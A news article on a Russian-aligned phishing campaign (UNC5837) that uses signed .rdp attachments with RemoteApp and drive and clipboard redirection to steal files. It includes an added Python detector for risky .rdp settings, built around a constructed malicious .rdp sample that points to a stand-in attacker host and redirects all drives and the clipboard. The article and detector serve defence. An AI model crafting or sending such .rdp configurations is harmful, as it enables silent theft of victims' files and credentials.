
Disguised as a joint project between tech giants and a European government, one email can make your entire system a drive-thru for Kremlin-backed spies.
A quiet storm has hit European government and military networks – a phishing campaign attributed to a Russian-aligned threat actor group. The main goal here looks like classic spycraft – snooping and stealing files – but how deep the rabbit hole goes is still anyone’s guess.
The crooks, dubbed UNC5837 by Google Threat Intelligence Group (GTIG), exploited a legitimate Windows service – Remote Desktop Protocol (RDP), which lets users control and operate computers from a distance.
Unlike typical RDP attacks where hackers take over your screen and start clicking around, this campaign played it smarter.
It used two lesser-known RDP features: resource redirection to map your files straight to their server and RemoteApps to sneak in an attacker-controlled app that looks like it belongs. No flashy takeover, just quiet access to the sensitive files.
Behind the scenes, the attackers were browsing the victim’s files, capturing clipboard data that might include sensitive credentials and siphoning off data, maybe even watching what they were typing.
How does the trick work?
Imagine getting an email that claims to be from a joint project between Amazon, Microsoft, and the Ukrainian government. Big logos, clean formatting, all very serious. No urgent password resets. Just a slick-sounding attachment called "AWS Secure Storage Connection Stability Test" – with the added assurance that if it glitches, don’t sweat it.
“An error report will be generated automatically,” it says.
The attachment is a digitally signed .rdp file, which looks perfectly normal in corporate environments. Because the signature is backed by a Let’s Encrypt certificate, your operating system gives it a big thumbs-up and suppresses the usual warning. Just double-click and go.

However, once you launch the file, your system initiates an outbound RDP session to a domain tied to the Let’s Encrypt certificate – which means your computer is the one making the connection. Since no inbound connection is involved, a firewall watching for incoming traffic raises no alert.
To avoid being too obvious, the attackers didn’t pop open a full remote desktop window. Instead, they used RemoteApp, a lesser-known RDP feature that displays a single application window – in this case, a generic-looking utility titled “AWS Secure Storage Connection Stability Test.” That window is actually running on the threat actor’s server.
As long as that RDP session is live, the attackers are plugged directly into your system’s arteries. The RDP configuration in the file hands over read and write access to all of your local drives, plus your clipboard, which is often stacked with passwords, notes, crypto wallet keys, and loads of other sensitive information.

It also enables access to printers, ports, smartcards, and audio devices, rerouting the data into the attacker’s hands as if they were sitting right next to you.
This whole operation hinges on a built-in Microsoft feature called resource redirection, which uses “virtual channels” to sync hardware between the victim and attacker machines.
Digging deeper, indicators suggest the threat actors likely used PyRDP, an open-source RDP proxy. This technique has been previously dubbed “Rogue RDP.” PyRDP is tailor-made for this kind of silent heist – letting attackers intercept RDP sessions, record everything, and scrape off anything juicy.
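As an added example, not taken from GTIG’s report or from this article, the following Python parses the key:type:value lines of an .rdp attachment and flags the settings described above (drive and clipboard redirection, RemoteApp mode, a suppressing signature). The sample file, its host name and signature blob are constructed.

```python
import re

# Constructed sample in the style of the campaign's attachment (not a real IoC):
# outbound session to an attacker host, all drives + clipboard redirected,
# RemoteApp mode so the victim only ever sees one "utility" window.
SAMPLE_RDP = """\
full address:s:storage-test.attacker.invalid
remoteapplicationmode:i:1
remoteapplicationname:s:AWS Secure Storage Connection Stability Test
remoteapplicationprogram:s:||AWSTest
drivestoredirect:s:*
redirectclipboard:i:1
redirectprinters:i:1
redirectsmartcards:i:1
redirectcomports:i:1
audiocapturemode:i:1
signscope:s:Full Address,Remote Application Mode,Drive Store Direct
signature:s:PLACEHOLDER_SIGNATURE_BLOB
"""

# Each .rdp line is "<key>:<type>:<value>" where type is s (string) or i (integer).
LINE_RE = re.compile(r"^([^:]+):([si]):(.*)$")

def parse_rdp(text):
    """Parse .rdp settings into a dict; keys lowercased, i-values converted to int."""
    settings = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # blank or malformed line, ignore
        key, kind, value = m.groups()
        settings[key.strip().lower()] = int(value) if kind == "i" else value
    return settings

def assess_rdp(text):
    """Return (severity, reason) findings for the redirection/RemoteApp settings."""
    s = parse_rdp(text)
    findings = []
    if s.get("drivestoredirect", "") == "*":
        findings.append(("high", "all local drives redirected to remote host"))
    elif s.get("drivestoredirect"):
        findings.append(("medium", "local drives redirected: " + s["drivestoredirect"]))
    if s.get("redirectclipboard") == 1:
        findings.append(("high", "clipboard shared with remote host"))
    if s.get("remoteapplicationmode") == 1:
        findings.append(("high", "RemoteApp mode: only a single remote window is shown"))
    for key in ("redirectprinters", "redirectsmartcards", "redirectcomports", "audiocapturemode"):
        if s.get(key) == 1:
            findings.append(("medium", key + " enabled"))
    if "signature" in s:  # a valid signature suppresses the client warning; verify the signer
        findings.append(("info", "file is signed: check which certificate and domain it vouches for"))
    return findings
```

Mail-gateway or endpoint tooling can run `assess_rdp` over any .rdp attachment and quarantine files with high-severity findings rather than relying on the client warning the signature disables.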

RDPs are vulnerable to attacks
Google’s GTIG indicates that the phishing campaign was identified in October 2024.
The campaign of mass-distributed emails with .rdp file attachments has been previously reported by the Computer Emergency Response Team of Ukraine (CERT-UA), TrendMicro, and Amazon.
At the same time, Microsoft warned of Russian threat actor Cozy Bear, which unleashed a similar campaign, targeting over 100 organizations in critical sectors.
The attackers send carefully crafted emails to trick users into opening a Remote Desktop Protocol (RDP) configuration file, leading to compromise.
A report by the cybersecurity company Malwarebytes claims that 58% of the ransomware attacks it handled began with an RDP intrusion.